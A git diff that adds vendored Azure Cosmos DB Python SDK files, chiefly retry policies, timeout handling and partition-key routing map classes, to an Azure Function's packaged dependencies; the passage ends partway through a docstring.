+ """ + + def __init__( + self, max_retry_attempt_count=9, fixed_retry_interval_in_milliseconds=None, max_wait_time_in_seconds=30 + ): + self._max_retry_attempt_count = max_retry_attempt_count + self._fixed_retry_interval_in_milliseconds = fixed_retry_interval_in_milliseconds + self._max_wait_time_in_seconds = max_wait_time_in_seconds + + @property + def MaxRetryAttemptCount(self): + return self._max_retry_attempt_count + + @property + def FixedRetryIntervalInMilliseconds(self): + return self._fixed_retry_interval_in_milliseconds + + @property + def MaxWaitTimeInSeconds(self): + return self._max_wait_time_in_seconds diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_utility.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_utility.py new file mode 100644 index 0000000..5f0fc2c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_utility.py @@ -0,0 +1,215 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal methods for executing functions in the Azure Cosmos database service. +""" + +import time + +from azure.core.exceptions import AzureError, ClientAuthenticationError +from azure.core.pipeline.policies import RetryPolicy + +from . import exceptions +from . import _endpoint_discovery_retry_policy +from . import _resource_throttle_retry_policy +from . import _default_retry_policy +from . import _session_retry_policy +from . 
import _gone_retry_policy +from .http_constants import HttpHeaders, StatusCodes, SubStatusCodes + + +# pylint: disable=protected-access + + +def Execute(client, global_endpoint_manager, function, *args, **kwargs): + """Executes the function with passed parameters applying all retry policies + + :param object client: + Document client instance + :param object global_endpoint_manager: + Instance of _GlobalEndpointManager class + :param function function: + Function to be called wrapped with retries + :param (non-keyworded, variable number of arguments list) *args: + :param (keyworded, variable number of arguments list) **kwargs: + + """ + # instantiate all retry policies here to be applied for each request execution + endpointDiscovery_retry_policy = _endpoint_discovery_retry_policy.EndpointDiscoveryRetryPolicy( + client.connection_policy, global_endpoint_manager, *args + ) + + resourceThrottle_retry_policy = _resource_throttle_retry_policy.ResourceThrottleRetryPolicy( + client.connection_policy.RetryOptions.MaxRetryAttemptCount, + client.connection_policy.RetryOptions.FixedRetryIntervalInMilliseconds, + client.connection_policy.RetryOptions.MaxWaitTimeInSeconds, + ) + defaultRetry_policy = _default_retry_policy.DefaultRetryPolicy(*args) + + sessionRetry_policy = _session_retry_policy._SessionRetryPolicy( + client.connection_policy.EnableEndpointDiscovery, global_endpoint_manager, *args + ) + partition_key_range_gone_retry_policy = _gone_retry_policy.PartitionKeyRangeGoneRetryPolicy(client, *args) + + while True: + try: + client_timeout = kwargs.get('timeout') + start_time = time.time() + if args: + result = ExecuteFunction(function, global_endpoint_manager, *args, **kwargs) + else: + result = ExecuteFunction(function, *args, **kwargs) + if not client.last_response_headers: + client.last_response_headers = {} + + # setting the throttle related response headers before returning the result + client.last_response_headers[ + HttpHeaders.ThrottleRetryCount + ] = resourceThrottle_retry_policy.current_retry_attempt_count + client.last_response_headers[ + HttpHeaders.ThrottleRetryWaitTimeInMs + ] = resourceThrottle_retry_policy.cummulative_wait_time_in_milliseconds + + return result + except exceptions.CosmosHttpResponseError as e: + retry_policy = None + if e.status_code == StatusCodes.FORBIDDEN and e.sub_status == SubStatusCodes.WRITE_FORBIDDEN: + retry_policy = endpointDiscovery_retry_policy + elif e.status_code == StatusCodes.TOO_MANY_REQUESTS: + retry_policy = resourceThrottle_retry_policy + elif ( + e.status_code == StatusCodes.NOT_FOUND + and e.sub_status + and e.sub_status == SubStatusCodes.READ_SESSION_NOTAVAILABLE + ): + retry_policy = sessionRetry_policy + elif exceptions._partition_range_is_gone(e): + retry_policy = partition_key_range_gone_retry_policy + else: + retry_policy = defaultRetry_policy + + # If none of the retry policies applies or there is no retry needed, set the + # throttle related response headers and re-throw the exception back arg[0] + # is the request. 
It needs to be modified for write forbidden exception + if not retry_policy.ShouldRetry(e): + if not client.last_response_headers: + client.last_response_headers = {} + client.last_response_headers[ + HttpHeaders.ThrottleRetryCount + ] = resourceThrottle_retry_policy.current_retry_attempt_count + client.last_response_headers[ + HttpHeaders.ThrottleRetryWaitTimeInMs + ] = resourceThrottle_retry_policy.cummulative_wait_time_in_milliseconds + if args and args[0].should_clear_session_token_on_session_read_failure: + client.session.clear_session_token(client.last_response_headers) + raise + + # Wait for retry_after_in_milliseconds time before the next retry + time.sleep(retry_policy.retry_after_in_milliseconds / 1000.0) + if client_timeout: + kwargs['timeout'] = client_timeout - (time.time() - start_time) + if kwargs['timeout'] <= 0: + raise exceptions.CosmosClientTimeoutError() + + +def ExecuteFunction(function, *args, **kwargs): + """Stub method so that it can be used for mocking purposes as well. + """ + return function(*args, **kwargs) + + +def _configure_timeout(request, absolute, per_request): + # type: (azure.core.pipeline.PipelineRequest, Optional[int], int) -> Optional[AzureError] + if absolute is not None: + if absolute <= 0: + raise exceptions.CosmosClientTimeoutError() + if per_request: + # Both socket timeout and client timeout have been provided - use the shortest value. + request.context.options['connection_timeout'] = min(per_request, absolute) + else: + # Only client timeout provided. + request.context.options['connection_timeout'] = absolute + elif per_request: + # Only socket timeout provided. + request.context.options['connection_timeout'] = per_request + + +class ConnectionRetryPolicy(RetryPolicy): + + def __init__(self, **kwargs): + clean_kwargs = {k: v for k, v in kwargs.items() if v is not None} + super(ConnectionRetryPolicy, self).__init__(**clean_kwargs) + + def send(self, request): + """Sends the PipelineRequest object to the next policy. Uses retry settings if necessary. + Also enforces an absolute client-side timeout that spans multiple retry attempts. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + :return: Returns the PipelineResponse or raises error if maximum retries exceeded. + :rtype: ~azure.core.pipeline.PipelineResponse + :raises ~azure.core.exceptions.AzureError: Maximum retries exceeded. + :raises ~azure.cosmos.exceptions.CosmosClientTimeoutError: Specified timeout exceeded. + :raises ~azure.core.exceptions.ClientAuthenticationError: Authentication failed. 
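+
+        Policy construction sketch (retry_total and retry_backoff_max are
+        standard azure.core retry settings, shown here only as an
+        illustration):
+
+        >>> policy = ConnectionRetryPolicy(retry_total=3, retry_backoff_max=30)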
+ """ + absolute_timeout = request.context.options.pop('timeout', None) + per_request_timeout = request.context.options.pop('connection_timeout', 0) + + retry_error = None + retry_active = True + response = None + retry_settings = self.configure_retries(request.context.options) + while retry_active: + try: + start_time = time.time() + _configure_timeout(request, absolute_timeout, per_request_timeout) + + response = self.next.send(request) + if self.is_retry(retry_settings, response): + retry_active = self.increment(retry_settings, response=response) + if retry_active: + self.sleep(retry_settings, request.context.transport, response=response) + continue + break + except ClientAuthenticationError: # pylint:disable=try-except-raise + # the authentication policy failed such that the client's request can't + # succeed--we'll never have a response to it, so propagate the exception + raise + except exceptions.CosmosClientTimeoutError as timeout_error: + timeout_error.inner_exception = retry_error + timeout_error.response = response + timeout_error.history = retry_settings['history'] + raise + except AzureError as err: + retry_error = err + if self._is_method_retryable(retry_settings, request.http_request): + retry_active = self.increment(retry_settings, response=request, error=err) + if retry_active: + self.sleep(retry_settings, request.context.transport) + continue + raise err + finally: + end_time = time.time() + if absolute_timeout: + absolute_timeout -= (end_time - start_time) + + self.update_context(response.context, retry_settings) + return response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__init__.py new file mode 100644 index 0000000..c8cc2af --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__init__.py @@ -0,0 +1,20 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. 
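The throttle-retry handshake that the Execute loop in _retry_utility.py above implements can be exercised in isolation. A minimal sketch, assuming only the vendored modules this diff adds; the simulated throttling exception and its 5 ms retry hint are hypothetical:

    import time

    from azure.cosmos import http_constants
    from azure.cosmos import _resource_throttle_retry_policy


    class FakeThrottledError(Exception):
        """Stand-in for a CosmosHttpResponseError carrying a 429 retry hint."""

        def __init__(self):
            super(FakeThrottledError, self).__init__("Request rate is large")
            self.headers = {http_constants.HttpHeaders.RetryAfterInMilliseconds: "5"}


    policy = _resource_throttle_retry_policy.ResourceThrottleRetryPolicy(
        max_retry_attempt_count=3,
        fixed_retry_interval_in_milliseconds=None,
        max_wait_time_in_seconds=30,
    )

    calls = 0
    while True:
        try:
            calls += 1
            raise FakeThrottledError()  # every attempt is throttled in this sketch
        except FakeThrottledError as error:
            if not policy.ShouldRetry(error):
                break  # retry budget exhausted; Execute would re-raise here
            time.sleep(policy.retry_after_in_milliseconds / 1000.0)

    assert calls == 4  # the initial attempt plus max_retry_attempt_count retries

The loop mirrors what Execute does after catching a 429: ask ShouldRetry, sleep for retry_after_in_milliseconds, and give up once the retry budget is spent.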
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..078180e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/collection_routing_map.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/collection_routing_map.cpython-39.pyc new file mode 100644 index 0000000..74b8e30 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/collection_routing_map.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_map_provider.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_map_provider.cpython-39.pyc new file mode 100644 index 0000000..133d356 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_map_provider.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_range.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_range.cpython-39.pyc new file mode 100644 index 0000000..9374915 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/__pycache__/routing_range.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__init__.py new file mode 100644 index 0000000..a9253df --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__init__.py @@ -0,0 +1,20 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..a7cda0d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/routing_map_provider.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/routing_map_provider.cpython-39.pyc new file mode 100644 index 0000000..4f8a944 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/__pycache__/routing_map_provider.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/routing_map_provider.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/routing_map_provider.py new file mode 100644 index 0000000..9012f21 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/aio/routing_map_provider.py @@ -0,0 +1,194 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for partition key range cache implementation in the Azure +Cosmos database service. +""" + +from ... import _base +from ..collection_routing_map import CollectionRoutingMap +from .. import routing_range + +# pylint: disable=protected-access + + +class PartitionKeyRangeCache(object): + """ + PartitionKeyRangeCache provides list of effective partition key ranges for a + collection. + + This implementation loads and caches the collection routing map per + collection on demand. 
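+
+    Usage sketch (client and collection link are hypothetical; requires a
+    running event loop)::
+
+        cache = PartitionKeyRangeCache(cosmos_client_connection)
+        full_range = routing_range.Range("", "FF", True, False)
+        overlapping = await cache.get_overlapping_ranges(
+            "dbs/mydb/colls/mycoll", [full_range])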
+ """ + + def __init__(self, client): + """ + Constructor + """ + + self._documentClient = client + + # keeps the cached collection routing map by collection id + self._collection_routing_map_by_item = {} + + async def get_overlapping_ranges(self, collection_link, partition_key_ranges): + """Given a partition key range and a collection, return the list of + overlapping partition key ranges. + + :param str collection_link: The name of the collection. + :param list partition_key_ranges: List of partition key range. + :return: List of overlapping partition key ranges. + :rtype: list + """ + cl = self._documentClient + + collection_id = _base.GetResourceIdOrFullNameFromLink(collection_link) + + collection_routing_map = self._collection_routing_map_by_item.get(collection_id) + if collection_routing_map is None: + collection_pk_ranges = [pk async for pk in cl._ReadPartitionKeyRanges(collection_link)] + # for large collections, a split may complete between the read partition key ranges query page responses, + # causing the partitionKeyRanges to have both the children ranges and their parents. Therefore, we need + # to discard the parent ranges to have a valid routing map. + collection_pk_ranges = PartitionKeyRangeCache._discard_parent_ranges(collection_pk_ranges) + collection_routing_map = CollectionRoutingMap.CompleteRoutingMap( + [(r, True) for r in collection_pk_ranges], collection_id + ) + self._collection_routing_map_by_item[collection_id] = collection_routing_map + return collection_routing_map.get_overlapping_ranges(partition_key_ranges) + + @staticmethod + def _discard_parent_ranges(partitionKeyRanges): + parentIds = set() + for r in partitionKeyRanges: + if isinstance(r, dict) and routing_range.PartitionKeyRange.Parents in r: + for parentId in r[routing_range.PartitionKeyRange.Parents]: + parentIds.add(parentId) + return (r for r in partitionKeyRanges if r[routing_range.PartitionKeyRange.Id] not in parentIds) + + +def _second_range_is_after_first_range(range1, range2): + if range1.max > range2.min: + ##r.min < #previous_r.max + return False + + if range2.min == range1.max and range1.isMaxInclusive and range2.isMinInclusive: + # the inclusive ending endpoint of previous_r is the same as the inclusive beginning endpoint of r + return False + + return True + + +def _is_sorted_and_non_overlapping(ranges): + for idx, r in list(enumerate(ranges))[1:]: + previous_r = ranges[idx - 1] + if not _second_range_is_after_first_range(previous_r, r): + return False + return True + + +def _subtract_range(r, partition_key_range): + """Evaluates and returns r - partition_key_range + + :param dict partition_key_range: Partition key range. + :param routing_range.Range r: query range. + :return: The subtract r - partition_key_range. + :rtype: routing_range.Range + """ + + left = max(partition_key_range[routing_range.PartitionKeyRange.MaxExclusive], r.min) + + if left == r.min: + leftInclusive = r.isMinInclusive + else: + leftInclusive = False + + queryRange = routing_range.Range(left, r.max, leftInclusive, r.isMaxInclusive) + return queryRange + + +class SmartRoutingMapProvider(PartitionKeyRangeCache): + """ + Efficiently uses PartitionKeyRangeCache and minimizes the unnecessary + invocation of CollectionRoutingMap.get_overlapping_ranges() + """ + + async def get_overlapping_ranges(self, collection_link, partition_key_ranges): + """ + Given the sorted ranges and a collection, + Returns the list of overlapping partition key ranges + + :param str collection_link: The collection link. 
+ :param (list of routing_range.Range) partition_key_ranges: + The sorted list of non-overlapping ranges. + :return: List of partition key ranges. + :rtype: list of dict + :raises ValueError: + If two ranges in partition_key_ranges overlap or if the list is not sorted + """ + + # validate if the list is non-overlapping and sorted + if not _is_sorted_and_non_overlapping(partition_key_ranges): + raise ValueError("the list of ranges is not a non-overlapping sorted ranges") + + target_partition_key_ranges = [] + + it = iter(partition_key_ranges) + try: + currentProvidedRange = next(it) + while True: + if currentProvidedRange.isEmpty(): + # skip and go to the next item\ + currentProvidedRange = next(it) + continue + + if target_partition_key_ranges: + queryRange = _subtract_range(currentProvidedRange, target_partition_key_ranges[-1]) + else: + queryRange = currentProvidedRange + + overlappingRanges = await PartitionKeyRangeCache.get_overlapping_ranges(self, + collection_link, queryRange) + assert overlappingRanges, "code bug: returned overlapping ranges for queryRange {} is empty".format( + queryRange + ) + target_partition_key_ranges.extend(overlappingRanges) + + lastKnownTargetRange = routing_range.Range.PartitionKeyRangeToRange(target_partition_key_ranges[-1]) + + # the overlapping ranges must contain the requested range + assert ( + currentProvidedRange.max <= lastKnownTargetRange.max + ), "code bug: returned overlapping ranges {} does not contain the requested range {}".format( + overlappingRanges, queryRange + ) + + # the current range is contained in target_partition_key_ranges just move forward + currentProvidedRange = next(it) + + while currentProvidedRange.max <= lastKnownTargetRange.max: + # the current range is covered too. just move forward + currentProvidedRange = next(it) + except StopIteration: + # when the iteration is exhausted we get here. There is nothing else to be done + pass + + return target_partition_key_ranges diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/collection_routing_map.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/collection_routing_map.py new file mode 100644 index 0000000..28cb6bc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/collection_routing_map.py @@ -0,0 +1,181 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for collection routing map implementation in the Azure Cosmos +database service. +""" + +import bisect + +from six.moves import xrange + +from azure.cosmos._routing import routing_range +from azure.cosmos._routing.routing_range import PartitionKeyRange + + +class CollectionRoutingMap(object): + """Stores partition key ranges in an efficient way with some additional + information and provides convenience methods for working with set of ranges. + """ + + MinimumInclusiveEffectivePartitionKey = "" + MaximumExclusiveEffectivePartitionKey = "FF" + + def __init__( + self, range_by_id, range_by_info, ordered_partition_key_ranges, ordered_partition_info, collection_unique_id + ): + self._rangeById = range_by_id + self._rangeByInfo = range_by_info + self._orderedPartitionKeyRanges = ordered_partition_key_ranges + + self._orderedRanges = [ + routing_range.Range(pkr[PartitionKeyRange.MinInclusive], pkr[PartitionKeyRange.MaxExclusive], True, False) + for pkr in ordered_partition_key_ranges + ] + self._orderedPartitionInfo = ordered_partition_info + self._collectionUniqueId = collection_unique_id + + @classmethod + def CompleteRoutingMap(cls, partition_key_range_info_tupple_list, collection_unique_id): + rangeById = {} + rangeByInfo = {} + + sortedRanges = [] + for r in partition_key_range_info_tupple_list: + rangeById[r[0][PartitionKeyRange.Id]] = r + rangeByInfo[r[1]] = r[0] + sortedRanges.append(r) + + sortedRanges.sort(key=lambda r: r[0][PartitionKeyRange.MinInclusive]) + partitionKeyOrderedRange = [r[0] for r in sortedRanges] + orderedPartitionInfo = [r[1] for r in sortedRanges] + + if not CollectionRoutingMap.is_complete_set_of_range(partitionKeyOrderedRange): + return None + return cls(rangeById, rangeByInfo, partitionKeyOrderedRange, orderedPartitionInfo, collection_unique_id) + + def get_ordered_partition_key_ranges(self): + """Gets the ordered partition key ranges + + :return: Ordered list of partition key ranges. + :rtype: list + """ + return self._orderedPartitionKeyRanges + + def get_range_by_effective_partition_key(self, effective_partition_key_value): + """Gets the range containing the given partition key + + :param str effective_partition_key_value: The partition key value. + :return: The partition key range. + :rtype: dict + """ + if CollectionRoutingMap.MinimumInclusiveEffectivePartitionKey == effective_partition_key_value: + return self._orderedPartitionKeyRanges[0] + + if CollectionRoutingMap.MaximumExclusiveEffectivePartitionKey == effective_partition_key_value: + return None + + sortedLow = [(r.min, not r.isMinInclusive) for r in self._orderedRanges] + + index = bisect.bisect_right(sortedLow, (effective_partition_key_value, True)) + if index > 0: + index = index - 1 + return self._orderedPartitionKeyRanges[index] + + def get_range_by_partition_key_range_id(self, partition_key_range_id): + """Gets the partition key range given the partition key range id + + :param str partition_key_range_id: The partition key range id. + :return: The partition key range. 
+ :rtype: dict + """ + t = self._rangeById.get(partition_key_range_id) + + if t is None: + return None + return t[0] + + def get_overlapping_ranges(self, provided_partition_key_ranges): + """Gets the partition key ranges overlapping the provided ranges + + :param list provided_partition_key_ranges: List of partition key ranges. + :return: List of partition key ranges, where each is a dict. + :rtype: list + """ + + if isinstance(provided_partition_key_ranges, routing_range.Range): + return self.get_overlapping_ranges([provided_partition_key_ranges]) + + minToPartitionRange = {} + + sortedLow = [(r.min, not r.isMinInclusive) for r in self._orderedRanges] + sortedHigh = [(r.max, r.isMaxInclusive) for r in self._orderedRanges] + + for providedRange in provided_partition_key_ranges: + minIndex = bisect.bisect_right(sortedLow, (providedRange.min, not providedRange.isMinInclusive)) + if minIndex > 0: + minIndex = minIndex - 1 + + maxIndex = bisect.bisect_left(sortedHigh, (providedRange.max, providedRange.isMaxInclusive)) + if maxIndex >= len(sortedHigh): + maxIndex = maxIndex - 1 + + for i in xrange(minIndex, maxIndex + 1): + if routing_range.Range.overlaps(self._orderedRanges[i], providedRange): + minToPartitionRange[ + self._orderedPartitionKeyRanges[i][PartitionKeyRange.MinInclusive] + ] = self._orderedPartitionKeyRanges[i] + + overlapping_partition_key_ranges = list(minToPartitionRange.values()) + + def getKey(r): + return r[PartitionKeyRange.MinInclusive] + + overlapping_partition_key_ranges.sort(key=getKey) + return overlapping_partition_key_ranges + + @staticmethod + def is_complete_set_of_range(ordered_partition_key_range_list): + isComplete = False + if ordered_partition_key_range_list: + + firstRange = ordered_partition_key_range_list[0] + lastRange = ordered_partition_key_range_list[-1] + isComplete = ( + firstRange[PartitionKeyRange.MinInclusive] == CollectionRoutingMap.MinimumInclusiveEffectivePartitionKey + ) + isComplete &= ( + lastRange[PartitionKeyRange.MaxExclusive] == CollectionRoutingMap.MaximumExclusiveEffectivePartitionKey + ) + + for i in range(1, len(ordered_partition_key_range_list)): + previousRange = ordered_partition_key_range_list[i - 1] + currentRange = ordered_partition_key_range_list[i] + isComplete &= ( + previousRange[PartitionKeyRange.MaxExclusive] == currentRange[PartitionKeyRange.MinInclusive] + ) + + if not isComplete: + if previousRange[PartitionKeyRange.MaxExclusive] > currentRange[PartitionKeyRange.MinInclusive]: + raise ValueError("Ranges overlap") + break + + return isComplete diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_map_provider.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_map_provider.py new file mode 100644 index 0000000..6193ae2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_map_provider.py @@ -0,0 +1,194 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following 
conditions:
+
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Internal class for partition key range cache implementation in the Azure
+Cosmos database service.
+"""
+
+from .. import _base
+from .collection_routing_map import CollectionRoutingMap
+from . import routing_range
+from .routing_range import PartitionKeyRange
+
+# pylint: disable=protected-access
+
+
+class PartitionKeyRangeCache(object):
+    """
+    PartitionKeyRangeCache provides the list of effective partition key ranges
+    for a collection.
+
+    This implementation loads and caches the collection routing map per
+    collection on demand.
+    """
+
+    def __init__(self, client):
+        """
+        Constructor
+        """
+
+        self._documentClient = client
+
+        # keeps the cached collection routing map by collection id
+        self._collection_routing_map_by_item = {}
+
+    def get_overlapping_ranges(self, collection_link, partition_key_ranges):
+        """Given a list of partition key ranges and a collection, return the
